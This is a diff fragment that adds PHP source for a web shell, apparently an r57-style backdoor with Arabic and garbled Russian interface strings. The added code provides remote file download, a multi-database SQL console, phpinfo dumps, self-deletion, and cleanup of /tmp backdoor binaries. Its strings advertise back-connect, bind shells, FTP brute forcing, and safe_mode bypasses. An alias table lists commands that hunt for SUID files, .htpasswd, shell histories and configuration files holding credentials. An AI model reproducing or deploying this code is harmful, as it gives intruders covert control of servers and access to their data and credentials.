+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }
+  }
+ function affected_rows()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           return @mysql_affected_rows($this->res);
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  else
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");
+    echo $filedump;
+    exit();
+   }
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#000000>';
+ if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't select database</b></font></div>";
+   else
+    {
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5)
+      {
+      echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;
+       case '1':
+       if($sql->get_result())
+        {
+               echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+               $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>";
+        }
+       break;
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;
+       }
+      }
+     }
+    }
+   }
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'???? . ???????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+'ru_text86'=>'?????????? ????? ? ???????',
+'ru_butt14'=>'???????',
+'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
+'ru_text88'=>'FTP-??????:????',
+'ru_text89'=>'???? ?? ftp ???????',
+'ru_text90'=>'????? ????????',
+'ru_text91'=>'???????????? ?',
+'ru_text92'=>'??? ?????????',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????????',
+'ru_text95'=>'?????? ?????????????',
+'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
+'ru_text97'=>'????????? ??????????: ',
+'ru_text98'=>'??????? ???????????: ',
+'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
+'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
+'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
+'ru_text102'=>'?????',
+'ru_text103'=>'???????? ??????',
+'ru_text104'=>'???????? ????? ?? ???????? ????',
+'ru_text105'=>'????',
+'ru_text106'=>'??',
+'ru_text107'=>'????',
+'ru_butt15'=>'?????????',
+'ru_text108'=>'????? ??????',
+'ru_text109'=>'????????',
+'ru_text110'=>'??????????',
+'ru_text111'=>'SQL-?????? : ????',
+'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
+'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
+'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
+'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()',
+'ru_text116'=>'?????????? ????',
+'ru_text117'=>'?',
+'ru_text118'=>'???? ??????????',
+'ru_text119'=>'?? ??????? ??????????? ????',
+'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
+'ru_err1'=>'??????! ?? ???? ????????? ???? ',
+'ru_err2'=>'??????! ?? ??????? ??????? ',
+'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
+'ru_err4'=>'?????? ??????????? ?? ftp ???????',
+'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
+'ru_err6'=>'??????! ?? ??????? ????????? ??????',
+'ru_err7'=>'?????? ??????????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'ÇáÇãÑ ÇáãäÝÐ',
+'eng_text2' =>'ÊäÝíÐ ÇáÇæÇãÑ Ýí ÇáÓíÑÝÑ',
+'eng_text3' =>'ÇãÑ ÇáÊÔÛíá',
+'eng_text4' =>'ãßÇä Úãáß ÇáÇä Úáì ÇáÓíÑÝÑ',
+'eng_text5' =>'ÑÝÚ ãáÝ Çáì ÇáÓíÑÝÑ',
+'eng_text6' =>'ãÓÇÑ ãáÝß',
+'eng_text7' =>'ÇæÇãÑ ÌÇåÒå',
+'eng_text8' =>'ÇÎÊÑ ÇáÇãÑ',
+'eng_butt1' =>'ÊäÝíÐ',
+'eng_butt2' =>'ÑÝÜÚ',
+'eng_text9' =>'ÝÊÍ ÈæÑÊ Ýí ÇáÓíÑÝÑ Úáì /bin/bash',
+'eng_text10'=>'ÈÜæÑÊ',
+'eng_text11'=>'ÈÇÓæÑÏ ááÏÎæá',
+'eng_butt3' =>'ÝÊÍ',
+'eng_text12'=>'ÃÊÕÜÇá ÚÜßÓí',
+'eng_text13'=>'ÇáÇí Èí',
+'eng_text14'=>'ÇáãäÝÐ',
+'eng_butt4' =>'ÃÊÜÕÇá',
+'eng_text15'=>'ÓÍÈ ãáÝÇÊ Çáì ÇáÓíÑÝÑ',
+'eng_text16'=>'Úä ØÑíÞ',
+'eng_text17'=>'ÑÇÈØ ÇáãáÝ',
+'eng_text18'=>'ãßÇä äÒæáå',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'ÅÓÊÎÏã',
+'eng_text21'=>'&nbsp;ÇáÇÓã ÇáÌÏíÏ',
+'eng_text22'=>'ÇäÈæÈ ÇáÈíÇäÇÊ',
+'eng_text23'=>'ÇáÈæÑÊ ÇáãÍáí',
+'eng_text24'=>'ÇáÓíÑÝÑ ÇáÈÚíÏ',
+'eng_text25'=>'ÇáãäÝÐ ÇáÈÚíÏ',
+'eng_text26'=>'ÇÓÊÎÏã',
+'eng_butt5' =>'ÊÔÛíá',
+'eng_text28'=>'ÇáÚãá Ýí ÇáæÖÚ ÇáÇãä',
+'eng_text29'=>'ããäæÚ ÇáÏÎæá',
+'eng_butt6' =>'ÊÛíÑ',
+'eng_text30'=>'ÚÑÖ ãáÝ',
+'eng_butt7' =>'ÚÑÖ',
+'eng_text31'=>'ÇáãáÝ ÛíÑ ãæÌæÏ',
+'eng_text32'=>'ÊäÝíÐ ßæÏ php Úä ØÑíÞ ÏÇáå eval',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'ÇÎÊÈÇÑ',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'ÇáÞÇÚÏÉ . ÇáÌÏæá',
+'eng_text37'=>'ÇÓã ÇáãÓÊÎÏã',
+'eng_text38'=>'ßáãÉ ÇáãÑæÑ',
+'eng_text39'=>'ÇáÞÇÚÏÉ',
+'eng_text40'=>'äÓÎÉ ãä ÌÏÇæá ÇáÞÇÚÏÉ',
+'eng_butt9' =>'äÓÎÉ',
+'eng_text41'=>'ÍÝÙ ÇáäÓÎÉ Ýí',
+'eng_text42'=>'ÊÚÏíá ÇáãáÝÇÊ',
+'eng_text43'=>'ÇáãáÝ ÇáãÑÇÏ ÊÚÏíáå',
+'eng_butt10'=>'ÍÝÙ',
+'eng_text44'=>'áÇÊÓÊØíÚ ÇáÊÚÏíá Úáì åÐÇ ÇáãáÝ ÝÞØ ÊÞÑÃ',
+'eng_text45'=>'Êã ÇáÍÝÙ',
+'eng_text46'=>'ÚÑÖ phpinfo()',
+'eng_text47'=>'ÑÄíÉ ÇáãÊÛíÑÇÊ Ýí php.ini',
+'eng_text48'=>'ãÓÍ ãáÝÇÊ ÇáÜ temp',
+'eng_butt11'=>'ÊÍÑíÑ ÇáãáÝ',
+'eng_text49'=>'ãÓÍ ÇáÓßÑÈÊ ãä ÇáÓíÑÝÑ',
+'eng_text50'=>'ÚÑÖ ãÚáæãÇÊ ÇáÐÇßÑÉ ÇáÑÆíÓíÉ',
+'eng_text51'=>'ÚÑÖ ãÚáæãÇÊ ÇáÐÇßÑÉ',
+'eng_text52'=>'ÈÍË äÕ',
+'eng_text53'=>'Ýí ÇáãÓÇÑ',
+'eng_text54'=>'ÈÍË Úä äÕ Ýí ÇáãáÝÇÊ',
+'eng_butt12'=>'ÈÍË',
+'eng_text55'=>'ÝÞØ Ýí ÇáãáÝÇÊ',
+'eng_text56'=>'áÇíæÌÏ :(',
+'eng_text57'=>'ÇäÔÇÁ/ãÓÍ ãáÝ/ãÌáÏ',
+'eng_text58'=>'ÇáÇÓã',
+'eng_text59'=>'ãáÝ',
+'eng_text60'=>'ãÌáÏ',
+'eng_butt13'=>'ÅäÔÇÁ /ãÓÍ',
+'eng_text61'=>'Êã ÅäÔÇÁ ÇáãáÝ',
+'eng_text62'=>'Êã ÅäÔÇÁ ÇáãÌáÏ',
+'eng_text63'=>'Êã ãÓÍ ÇáãáÝ',
+'eng_text64'=>'Êã ãÓÍ ÇáãÌáÏ',
+'eng_text65'=>'ÅäÔÇÁ',
+'eng_text66'=>'ãÓÍ',
+'eng_text67'=>'ÇáÊÕÑíÍ/ÇáãÓÊÎÏã/ÇáãÌãæÚÉ',
+'eng_text68'=>'ÇãÑ',
+'eng_text69'=>'ÅÓã ÇáãáÝ',
+'eng_text70'=>'ÇáÊÕÑíÍ',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'ÇáäÕ ÇáãÑÇÏ',
+'eng_text73'=>'ÈÍË Ýí ÇáãÌáÏÇÊ',
+'eng_text74'=>'ÈÍË Ýí ÇáãáÝÇÊ',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'ÇáÈÍË Úä äÕ Ýí ãáÝÇÊ ÈæÇÓØå find',
+'eng_text80'=>'ÇáäæÚ',
+'eng_text81'=>'ÇáÅÊÕÇáÇÊ',
+'eng_text82'=>'ÞæÇÚÏ ÇáÈíÇäÇÊ',
+'eng_text83'=>'ÊÔÛíá ÇãÑ ÇÓÊÚáÇã',
+'eng_text84'=>'ÇÓÊÚáÇã ÞÇÚÏÉ',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'ÊäÒíá ãáÝÇÊ ãä ÇáÓíÑÝÑ',
+'eng_butt14'=>'ÊÍãíá',
+'eng_text87'=>'ÊäÒíá ãáÝÇÊ ãä ÎÇÏã ÇáÇÝ Êí Èí',
+'eng_text88'=>'ÓíÑÝÑ ÇáÇÝ Êí Èí:ÇáãäÝÐ',
+'eng_text89'=>'ãáÝ Ýí ÇáÇÝ Êí Èí',
+'eng_text90'=>'ÇáÊÍæíá Çáì',
+'eng_text91'=>'ÇÑÔÝÉ',
+'eng_text92'=>'ãä ÛíÑ ÇáÇÑÔÝÉ',
+'eng_text93'=>'ÇáÇÝ Êí Èí',
+'eng_text94'=>'ÊÎãíä ÇáÇÝ Êí Èí',
+'eng_text95'=>'ÞÇÆãÉ ÇáãÓÊÎÏãíä',
+'eng_text96'=>'áã íÓÊØÚ ÓÍÈ ÞÇÆãÉ ÇáãÓÊÎÏãíä',
+'eng_text97'=>'Êã ÇáÝÍÕ: ',
+'eng_text98'=>'Êã ÈäÌÇÍ: ',
+'eng_text99'=>'* ÇÓÊÎÏã ÇÓãÇÁ ÇáãÓÊÎÏãíä Ýí ãáÝ /etc/passwd áÏÎæá ááÜ ftp',
+'eng_text100'=>'ÇÑÓÇá ãáÝ Çáì ÎÇÏã ÇáÇÝ Êí Èí',
+'eng_text101'=>'ÇÓÊÎÏã ÇáÇÓÇãí ãÚßæÓå áÊÎãíäåÇ',
+'eng_text102'=>'ÎÏãÇÊ ÇáÈÑíÏ',
+'eng_text103'=>'ÇÑÓÇá ÈÑíÏ',
+'eng_text104'=>'ÇÑÓÇá ãáÝ Çáì ÇáÇíãíá',
+'eng_text105'=>'Åáì',
+'eng_text106'=>'ãÜä',
+'eng_text107'=>'ÇáãæÖæÚ',
+'eng_butt15'=>'ÅÑÓÇá',
+'eng_text108'=>'ÇáÑÓÇáÉ',
+'eng_text109'=>'ãÎÝí',
+'eng_text110'=>'ÚÑÖ',
+'eng_text111'=>'ÓíÑÝÑ ÞæÇÚÏ ÇáÈíÇäÇÊ : ÇáãäÝÐ',
+'eng_text112'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ ÏÇáå mb_send_mail',
+'eng_text113'=>'ÞÑÇÆÉ ãÍÊæì ÇáãÌáÏÇÊ Úä ØÑíÞ via imap_list',
+'eng_text114'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ via imap_body',
+'eng_text115'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ compress.zlib://',
+'eng_text116'=>'äÓÎ ãä',
+'eng_text117'=>'Çáì',
+'eng_text118'=>'Êã äÓÎ ÇáãáÝ',
+'eng_text119'=>'áÇíÓÊØíÚ ÇáäÓÎ',
+'eng_err0'=>'ÎØÇÁ ! áÇíãßä ÇáßÊÇÈÉ Úáì åÐÇ ÇáãáÝ ',
+'eng_err1'=>'ÎØÇÁ ! ÛíÑ ÞÇÏÑ Úáì ÞÑÇÆå åÐÇ ÇáãáÝ ',
+'eng_err2'=>'ÎØÇÁ! áÇíãßä ÇáÇäÔÇÁ ',
+'eng_err3'=>'ÎØÇÁ! ÛíÑ ÞÇÏÑ Úáì ÇáÇÊÕÇá ÈÇáÇÝ Êí Èí',
+'eng_err4'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇáÏÎæá Çáì ÓíÑÝÑ ÇáÇÝ Êí Èí',
+'eng_err5'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÊÛíÑ ÇáãÌáÏ Ýí ÇáÇÝ Êí Èí',
+'eng_err6'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇÑÓÇá ÑÓÇáå',
+'eng_err7'=>'ÇáÈÑíÏ ÇÑÓá',
+'eng_text200'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ copy()',
+'eng_text202'=>'ãÓÇÑ ÇáãáÝ ÇáãÑÇÏ ÞÑÇÆÊå',
+'eng_text300'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ curl()',
+'eng_text302'=>'ãÓÇÑ ÇáãáÝ ÇáãÑÇÏ ÞÑÇÆÊå',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'ÇáÈÍË Úä ãáÝÇÊ suid'=>'find / -type f -perm -04000 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ suid Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -04000 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ suid'=>'find / -type f -perm -02000 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ suid Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -02000 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ config.inc.php'=>'find / -type f -name config.inc.php',
+'ÇáÈÍË Úä ãáÝÇÊ config.inc.php Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -name config.inc.php',
+'ÇáÈÍË Úä ãáÝÇÊ config* ÈÌãíÚ ÇáÇãÊÏÇÏÇÊ'=>'find / -type f -name "config*"',
+'ÇáÈÍË Úä ãáÝÇÊ config* Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -name "config*"',
+'ÇáÈÍË Úä ÇáãáÝÇÊ ÇáÞÇÈáÉ ááßÊÇÈÉ'=>'find / -type f -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãáÝÇÊ ÇáÞÇÈáÉ ááßÊÇÈÉ Ýí ÇáãÌáÏ ÇáÍÇáí'=>'find . -type f -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãÌáÏÇÊ ÇáÞÇÈáÉ ááßÊÇÈÉ'=>'find /  -type d -perm -2 -ls',
+'ÇáÈÍË Úä ÇáãÌáÏÇÊ ÇáÞÇÈáÉ ááßÊÇÈÉ Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type d -perm -2 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ æãÌáÏÇÊ ÞÇÈáÉ ááßÊÇÈÉ'=>'find / -perm -2 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ æãÌáÏÇÊ Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -perm -2 -ls',
+'ÇáÈÍË Úä ãáÝÇÊ service.pwd'=>'find / -type f -name service.pwd',
+'ÇáÈÍË Úä ãáÝÇÊ service.pwd Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name service.pwd',
+'ÇáÈÍË Úä ßá ãáÝÇÊ ÇáÌÏÑÇä ÇáäÇÑíÉ .htpasswd'=>'find / -type f -name .htpasswd',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ ÇáÌÏÑÇä ÇáäÇÑíÉ Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .htpasswd',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .bash_history'=>'find / -type f -name .bash_history',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .bash_history Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .bash_history',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .mysql_history'=>'find / -type f -name .mysql_history',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .mysql_history Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .mysql_history',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .fetchmailrc'=>'find / -type f -name .fetchmailrc',
+'ÇáÈÍË Úä ÌãíÚ ãáÝÇÊ .fetchmailrc Ýí ÇáãÓÇÑ ÇáÍÇáí'=>'find . -type f -name .fetchmailrc',
+'ÇÎÑ ãáÝÇÊ ãÔÛáå Ýí ÇáäÙÇã'=>'lsattr -va',
+'ÑÄíÉ ÇáÈæÑÊÇÊ ÇáãÝÊæÍÉ Ýí ÇáÓíÑÝÑ'=>'netstat -an | grep -i listen',
+'ÑÄíÉ ÍÇáÉ ÇáãÌáÏÇÊ æÇãßÇäíÉ ÇáÊäÝíÐ'=>'cat /etc/fstab',
